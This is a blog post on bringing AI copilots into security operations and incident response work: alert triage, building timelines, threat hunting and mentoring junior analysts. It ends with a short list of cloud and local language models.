AI in the SOC: What Works, What Doesn’t, and How to Start

Blue teams operate in chaos: unpredictable incident volumes, inconsistent data quality, and fragmented visibility across systems. The challenge isn’t just alert fatigue—it’s reconciling data from disparate log sources fast enough to respond effectively. We rarely know how many incidents will hit in a day, and when they stack up, it leads to analyst burnout.

It’s one thing to have a lot of work on, but with new attacks and ambiguous alert messages it is not just the volume of alerts, but it’s the complexity. There is an unofficial requirement to figure it out and get to the bottom of things in both an incident response or SOC role.

Each incident or alert can have resources that generate logs in different formats, with their own visibility gaps and syntax. It’s learning under pressure by interpreting log files and trying to classify user behaviour while minimising the time a threat actor is inside the environment.

As everything is changing so quickly, it’s just not possible for everyone to be across everything. Having a surface-level understanding is not the SME knowledge that one or 2 people on the team have. If they’re busy or on leave, you’ll know the pressure I’m talking about.

Of course, this is where AI comes in.

Think of your most recent tricky incident you were assigned. It was tricky because you didn’t have all the answers on log messages, log file locations, or the attack path, right? Could be something else, but this is our example for today.

You’re going through the EDR, the SIEM, pulling individual artifacts from systems, teams’ chats, email, and maybe even system build documentation that’s a decade old.

Instead of relying on this, imagine using a cyber copilot that’s trained on your environment, your tooling and your logs and has the external reach to look up external knowledge bases. It will not replace your experience, but it gets you an answer more quickly and is something to validate ideas off, especially when you’re stuck on why something makes little sense in the evidence.

What kinds of data should you train your copilot on?

SOP’s Your IR playbooks CMDB Past Incident Reports (Post Mortem’s or PIR’s )

The result is a copilot that has a unique context about your organisation. It’s not only inducted, it’s been on the team for years and remembers the time someone went threat hunting on a Friday and you ended up working all weekend to do incident response.

This is where I see one of the first use cases for a cyber copilot. Using it during a large scale incident, or just day to day to explain log messages and investigate multiple suspicious alerts at once.

It’s like hiring another DFIR person who is always on, never forgets context and actually reads the documentation.

Hopefully, you’re seeing how this could change your investigation processes for the better. I get it, though, these are pretty high-level. What about some other use cases?

SOC Triage AI can summarise alerts, link related activity, and surface patterns—like a sudden burst of failed logins followed by suspicious PowerShell usage DFIR Support During an investigation, AI can help build timelines (one of my favourite and critical steps to start with), map activity to MITRE techniques, and draft initial findings, while the rest of the team focuses on containment and eradication Threat Hunting (don’t do this on a Friday!) Need to search 5,000 systems for signs of persistence? Ask your AI to generate a Sigma rule based on a specific registry key or reference the LOLBin project, then translate it into the syntax of your SIEM uses.

The biggest benefits won’t come from the next shiny vendor product that’s just more of the same. They’ll come from using AI to capture and reuse your team’s institutional knowledge like your playbooks, your PIRs and your lessons learned—so that the next incident does not mean the worst.

Here’s something I wish I had 15 years ago: an always-on mentor. When I started my first IT job on the Microsoft helpdesk, we had ‘Mentors’ who had a little triangular orange flag on their desk. If you got stuck on a call, you could put the customer on hold and talk to them. These guys knew it all. They were gods amongst the junior techs.

Now we have AI mentors. Anyone can ask: “What does this obfuscated PowerShell command do”?

The response is something like: This is likely using IEX to execute a remote payload—commonly associated with initial access via phishing. Related MITRE techniques: T1059, T1204.

Brilliant, isn’t it? There’s a time and a place to learn how to decode obfuscated PowerShell, and I’m referring to the more advanced encoded scripts here, not just base64.

AI is always available for your juniors, or anyone trying to solve a challenging problem when analysing an incident.

If you’re wondering how to get started, all you need to do is pick a model. Different AI models respond differently, with newer models requiring less experience in using prompts to get even better results. As I’d mentioned earlier, using AI as a copilot with your internal documentation is probably best not uploaded to the cloud, however, OpenAI’s policy for enterprise clients said they would not use the data uploaded to train their model.

Once the genie is out of the bottle, I don’t think it can go back though (meaning you may not have a right to delete your data), so proceed with caution.

Here are some models you can try, both local and cloud-based.

OpenAI GPT-4

Type: Cloud (API available)

URL: https:/www.chatgpt.com

Description: GPT-4 is the most mature LLM in terms of reasoning, log summarisation, code interpretation, and language flexibility. Combined with Microsoft’s Azure offering, it can be deployed behind private network endpoints with strict egress controls.

Ollama + Mistral 7B / LLaMA3 (Local LLMs)

Type: Local / Offline

URL: https://ollama.com

Ollama makes it dead simple to run powerful open-source models like Mistral and LLaMA3 on your own machine—fully offline. Ideal for air-gapped IR environments or teams worried about data privacy.

Claude 3 (Anthropic)

Type: Cloud (API available)

URL: https://www.anthropic.com

Claude 3’s long context window (up to 200K tokens) makes it excellent for large log ingestion, timeline reviews, and structured parsing. It handles technical prompts better than GPT-3.5 and competes closely with GPT-4.

Ideal for: Teams working with large logs, memory dumps, or reports that exceed GPT-4’s token limits.

Google Gemini Pro (formerly Bard, API Available) Type: Cloud

URL: https://ai.google

Leave a Reply

Discover more from DFIR Insights

Subscribe now to keep reading and get access to the full archive.

Continue reading